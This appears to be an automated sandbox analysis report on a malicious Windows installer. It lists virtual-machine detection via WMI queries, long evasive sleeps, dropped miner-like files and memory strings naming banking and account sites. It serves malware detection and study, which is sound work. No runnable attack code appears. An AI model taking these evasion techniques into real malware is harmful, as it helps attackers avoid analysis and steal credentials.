Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\setupx 1.exe1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\setupx 1.exe1.exe System information queried: FirmwareTableInformation Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Memory allocated: 2F90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Memory allocated: 2F90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Memory allocated: 4F90000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 599672 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 599557 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 599448 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 599344 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 599122 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 599012 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598906 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598797 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598688 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598563 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598219 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598110 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Window / User API: threadDelayed 6445 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Window / User API: threadDelayed 653 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Window / User API: threadDelayed 2324 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7539 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2218 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Dropped PE file which has not been started: C:\ProgramData\Dllhost\WinRing0x64.sys Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Dropped PE file which has not been started: C:\ProgramData\Dllhost\winlogson.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\setupx 1.exe1.exe TID: 4732 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe TID: 1696 Thread sleep count: 6445 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -11068046444225724s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7388 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7440 Thread sleep count: 653 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -599672s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -599557s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7440 Thread sleep count: 2324 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -599448s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -599344s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -599234s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 3816 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -599122s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -599012s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -598906s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -598797s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -598688s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -598563s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -598344s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -598219s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe TID: 7384 Thread sleep time: -598110s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5976 Thread sleep count: 7539 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5932 Thread sleep count: 2218 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5192 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\setupx 1.exe1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CFFCDE FindFirstFileExW, 0_2_00CFFCDE
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CFFD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00CFFD8F
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CFFCDE FindFirstFileExW, 2_2_00CFFCDE
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CFFD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose, 2_2_00CFFD8F
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 599672 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 599557 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 599448 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 599344 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 599122 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 599012 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598906 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598797 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598688 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598563 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598219 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Thread delayed: delay time: 598110 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: ZHKYZWVTC38PGAWGZF49K.exe.2.dr Binary or memory string: Vmwaretrat
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696494690p
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: ZHKYZWVTC38PGAWGZF49K.exe.2.dr Binary or memory string: vboxservice
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: setupx 1.exe1.exe, 00000002.00000002.2255302659.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182620812.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308691400.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139748232.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113318598.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113138099.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ZHKYZWVTC38PGAWGZF49K.exe.2.dr Binary or memory string: Vmwareuser
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: setupx 1.exe1.exe, 00000002.00000003.1057994576.00000000037F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
